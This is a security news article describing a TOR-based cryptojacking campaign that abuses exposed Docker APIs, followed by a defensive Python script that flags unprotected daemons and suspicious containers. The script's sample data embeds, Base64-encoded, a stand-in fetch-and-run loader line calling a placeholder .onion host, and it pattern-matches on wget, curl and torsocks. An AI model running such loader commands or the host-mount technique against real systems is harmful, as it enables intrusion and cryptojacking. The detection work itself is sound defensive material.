Expanding TOR-Based Cryptojacking Attacks Exploit Misconfigured Docker APIs

Cybersecurity researchers have identified a new variant of a previously disclosed campaign that abuses the TOR network for cryptojacking attacks aimed at exposed Docker APIs. Akamai, which uncovered the recent activity last month, indicated that the campaign is designed to lock other actors out of the compromised Docker API once it has been reached over the internet. The findings build on an earlier report from Trend Micro in late June 2025, which described a campaign targeting exposed Docker instances to stealthily deploy an XMRig cryptocurrency miner fetched via a TOR (.onion) domain for anonymity. Security researcher Yonatan Gilvarg noted that the new strain appears to use tools similar to the original but may have a different objective, potentially laying the groundwork for a more complex botnet.

The attack chain begins with an unauthenticated request to a misconfigured Docker API that creates a new container from the Alpine image with the host file system bind-mounted into it, giving the attacker write access to the host from inside the container. The threat actors then run a Base64-encoded command that downloads a shell script from a .onion domain. That script modifies the SSH configuration for persistence and installs several tools, including Masscan, libpcap, libpcap-dev, zstd and Torsocks, which are used for reconnaissance, for contacting a command-and-control (C2) server and for downloading a compressed binary from a second .onion domain. The downloaded binary is a dropper written in Go that embeds its payload, so deploying the payload requires no further external communication. Notably, the binary's source code uses an emoji to represent logged-in users, which suggests it may have been developed with the help of a large language model (LLM).
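As an added example (not code from the Akamai or Trend Micro reports), the following Python script checks for the two conditions the attack chain above depends on: a Docker daemon configured to listen on TCP without TLS (a `daemon.json` check), and containers whose `docker inspect` records show the host root bind-mounted together with a Base64-decoded command that, once decoded, references a .onion host or a remote fetch. The inspect records, the container names and the `placeholder.onion` host are constructed here for illustration and are not indicators from the campaign.

```python
"""Flag the exposed-daemon and host-mount-plus-encoded-command pattern.

Added example. Sample data below is constructed; it is not campaign telemetry.
"""
from __future__ import annotations

import base64
import binascii
import json
import re
from typing import Any

# Constructed daemon.json: Docker reachable on all interfaces without tlsverify.
SAMPLE_DAEMON_JSON = json.dumps(
    {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
)

# Constructed, trimmed `docker inspect` output: one benign container and one
# that matches the pattern (alpine, "/" bind-mounted, base64-decoded command).
_ENCODED_CMD = base64.b64encode(
    b"chroot /hostroot sh -c 'wget -qO- http://placeholder.onion/x.sh | sh'"
).decode()
SAMPLE_INSPECT_JSON = json.dumps([
    {
        "Id": "aaa111",
        "Name": "/web",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}],
    },
    {
        "Id": "bbb222",
        "Name": "/elegant_turing",
        "Config": {"Image": "alpine", "Cmd": ["sh", "-c", f"echo {_ENCODED_CMD} | base64 -d | sh"]},
        "HostConfig": {"Binds": ["/:/hostroot"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostroot"}],
    },
])

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long blobs only, to limit noise


def daemon_exposes_tcp_without_tls(daemon_json: str) -> list[str]:
    """Return tcp:// listeners from daemon.json when tlsverify is not enabled."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify"):
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


def decode_embedded_base64(cmd: str) -> list[str]:
    """Decode every long Base64 blob in cmd that yields printable text."""
    found: list[str] = []
    for match in B64_RE.finditer(cmd):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            found.append(text)
    return found


def assess_container(rec: dict[str, Any]) -> dict[str, Any]:
    """Score one inspect record; flagged when host root is mounted and the
    command is Base64-decoded or its decoded form looks like a remote loader."""
    reasons: list[str] = []
    host_cfg = rec.get("HostConfig") or {}
    binds = host_cfg.get("Binds") or []
    mounts = rec.get("Mounts") or []
    host_root = any(b.split(":")[0] == "/" for b in binds) or any(
        m.get("Type") == "bind" and m.get("Source") == "/" for m in mounts
    )
    if host_root:
        reasons.append("host root filesystem bind-mounted")
    if host_cfg.get("Privileged"):
        reasons.append("privileged container")

    cfg = rec.get("Config") or {}
    cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    encoded = bool(re.search(r"base64\s+(-d|--decode)", cmd))
    if encoded:
        reasons.append("command is Base64-decoded at runtime")
    loader = False
    for text in decode_embedded_base64(cmd):
        if ".onion" in text:
            reasons.append("decoded payload references a .onion host")
            loader = True
        if re.search(r"\b(wget|curl|torsocks)\b", text):
            reasons.append("decoded payload fetches remote content")
            loader = True

    return {
        "id": rec.get("Id"),
        "name": rec.get("Name"),
        "image": cfg.get("Image"),
        "reasons": reasons,
        "flagged": host_root and (encoded or loader),
    }


def find_suspicious(inspect_json: str) -> list[dict[str, Any]]:
    """Return assessments for every flagged container in inspect output."""
    return [a for a in map(assess_container, json.loads(inspect_json)) if a["flagged"]]


if __name__ == "__main__":
    print("exposed listeners:", daemon_exposes_tcp_without_tls(SAMPLE_DAEMON_JSON))
    for hit in find_suspicious(SAMPLE_INSPECT_JSON):
        print(hit["name"], hit["image"], hit["reasons"])
```

On a real host, feed `docker inspect $(docker ps -aq)` to `find_suspicious` and `/etc/docker/daemon.json` to `daemon_exposes_tcp_without_tls`. The daemon check only reads `daemon.json`; a `-H tcp://...` flag in a systemd drop-in also exposes the API and is not covered here, so confirm with `ss -ltnp` that nothing is listening on 2375 or 2376 unless TLS client verification is in place.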

Categories: Cryptojacking, Docker Security, Malware Propagation

Tags: Cybersecurity, TOR Network, Cryptojacking, Docker APIs, Malicious Campaign, Botnet, Reconnaissance, Command-and-Control, Masscan, Remote Debugging